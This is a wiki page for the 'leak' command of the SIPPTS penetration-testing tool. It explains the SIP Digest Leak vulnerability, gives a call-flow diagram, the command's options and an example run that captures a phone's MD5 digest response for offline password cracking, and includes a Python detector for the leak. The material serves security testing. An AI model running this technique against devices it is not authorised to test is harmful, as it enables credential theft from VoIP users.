
Command leak

Jose Luis Verdeguer edited this page Sep 18, 2024 · 2 revisions

SIPPTS leak exploits the SIP Digest Leak vulnerability discovered by Sandro Gauci, which affects a large number of hardware and software devices. The vulnerability is described here: https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf

The goal is to place a call to a telephone device (with an INVITE message). When someone on the other side answers the call there is no audio, so he or she hangs up, and we receive a BYE message. We then reply with a 407 Proxy Authentication Required. If the telephone device is vulnerable, it responds with another BYE message that includes an authentication response.

With that response we can try to obtain the password by a brute-force attack on our local machine.

Script                                                         Phone
      ---> INVITE                                          ---> 
      <--- 100 Trying                                      <---
      <--- 180 Ringing                                     <---
      <--- 200 OK                                          <---
      ---> ACK                                             --->
      <--- BYE                                             <---
      ---> 407 Proxy Authentication Required (with digest) ---> 
      <--- BYE (with digest response)                      <---
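As an added example (not part of sippts or this page), the following Python detector walks a captured SIP dialog and flags the pattern in the diagram above: a phone that, after sending BYE and being challenged with 407, re-sends the BYE carrying a digest response. The dialog, Call-ID and digest parameters are constructed for this illustration; the header names (Proxy-Authenticate, Proxy-Authorization) are standard SIP.

```python
import re

# Constructed sample dialog (not a real capture): (sender, raw SIP message).
# "caller" is the remote side that placed the call; "phone" is the device under test.
SAMPLE_DIALOG = [
    ("caller", "INVITE sip:100@192.168.2.235 SIP/2.0\r\nCall-ID: leak1\r\nCSeq: 1 INVITE\r\n\r\n"),
    ("phone", "SIP/2.0 200 OK\r\nCall-ID: leak1\r\nCSeq: 1 INVITE\r\n\r\n"),
    ("phone", "BYE sip:100@10.0.0.1 SIP/2.0\r\nCall-ID: leak1\r\nCSeq: 2 BYE\r\n\r\n"),
    ("caller", 'SIP/2.0 407 Proxy Authentication Required\r\nCall-ID: leak1\r\nCSeq: 2 BYE\r\n'
               'Proxy-Authenticate: Digest realm="asterisk", nonce="lcwnqoz0"\r\n\r\n'),
    ("phone", 'BYE sip:100@10.0.0.1 SIP/2.0\r\nCall-ID: leak1\r\nCSeq: 3 BYE\r\n'
              'Proxy-Authorization: Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", '
              'uri="sip:100@10.0.0.1", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5\r\n\r\n'),
]

def parse_sip(raw):
    """Split a SIP message into its start line and a dict of lower-cased header names."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return start, headers

def parse_digest(value):
    """Turn 'Digest k="v", k2=v2' into a dict; quoted and bare values are both handled."""
    params = re.sub(r"^\s*digest\s*", "", value, flags=re.IGNORECASE)
    return {k.lower(): v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', params)}

def detect_digest_leak(dialog):
    """Flag phone-originated BYEs that carry digest credentials after the caller's 407.
    A phone should never answer an unauthenticated caller's challenge to its own BYE."""
    findings = []
    challenged = {}  # Call-ID -> nonce offered in the caller's 407
    for sender, raw in dialog:
        start, hdr = parse_sip(raw)
        call_id = hdr.get("call-id", "")
        if sender == "caller" and start.startswith("SIP/2.0 407"):
            challenged[call_id] = parse_digest(hdr.get("proxy-authenticate", "")).get("nonce")
        elif sender == "phone" and start.startswith("BYE") and call_id in challenged:
            auth = hdr.get("proxy-authorization") or hdr.get("authorization")
            if auth:
                d = parse_digest(auth)
                findings.append({"call_id": call_id, "username": d.get("username"),
                                 "realm": d.get("realm"),
                                 "nonce_matches_challenge": d.get("nonce") == challenged[call_id]})
    return findings
```

Running `detect_digest_leak(SAMPLE_DIALOG)` yields one finding for Call-ID leak1 with username pepelux; a phone that correctly ignores the 407 produces none.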

Usage

$ sippts leak -h

Target:
  -i IP|HOST          Host/IP address/network (ex: mysipserver.com | 192.168.0.10 | 192.168.0.0/24)
  -f FILE             File with several IPs (format: ip:port/proto ... one per line)
  -r REMOTE_PORT      Remote port (default: 5060)
  -p PROTOCOL         Protocol: udp|tcp (default: udp)
  -proxy IP:PORT      Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)

Headers:
  -d DOMAIN           SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
  -cd CONTACT_DOMAIN  Domain or IP address for Contact header. Ex: 10.0.1.2
  -fn FROM_NAME       From Name. Ex: Bob
  -fu FROM_USER       From User (default: 100)
  -fd FROM_DOMAIN     From Domain. Ex: 10.0.0.1
  -tn TO_NAME         To Name. Ex: Alice
  -tu TO_USER         To User (default: 100)
  -td TO_DOMAIN       To Domain. Ex: 10.0.0.1
  -ua USER_AGENT      User-Agent header (default: pplsip)
  -ppi PPI            P-Preferred-Identity
  -pai PAI            P-Asserted-Identity
  -sdp                Send SDP in INVITE messages
  -sdes               Send SDES in SDP

Auth:
  -auth AUTH_MODE     Authentication mode [www|proxy] (default: www)
  -user AUTH_USER     Authentication user
  -pass AUTH_PASS     Authentication password

Log:
  -v                  Increase verbosity
  -o FILE             Save digest to file in SipCrack format
  -l FILE             Save result into a log file

Other options:
  -local-ip IP        Set local IP address (by default try to get it)
  -ping               Ping host before send attack
  -h, --help          Show this help

Example

$ sippts leak -i 192.168.2.235

[!] Target: 192.168.2.235:5060/UDP
[!] Caller: 100
[!] Callee: 100

[=>] Request INVITE
[<=] Response 100 Trying
[<=] Response 180 Ringing
[<=] Response 200 OK
[=>] Request ACK
	... waiting for BYE ...
[<=] Received BYE
[=>] Request 407 Proxy Authentication Required
[<=] Received BYE with digest
[=>] Request 200 Ok

Auth=Digest username="pepelux", realm="asterisk", nonce="lcwnqoz0", uri="sip:100@192.168.2.235:56583;transport=UDP", response="31fece0d4ff6fd524c1d4c9482e99bb2", algorithm=MD5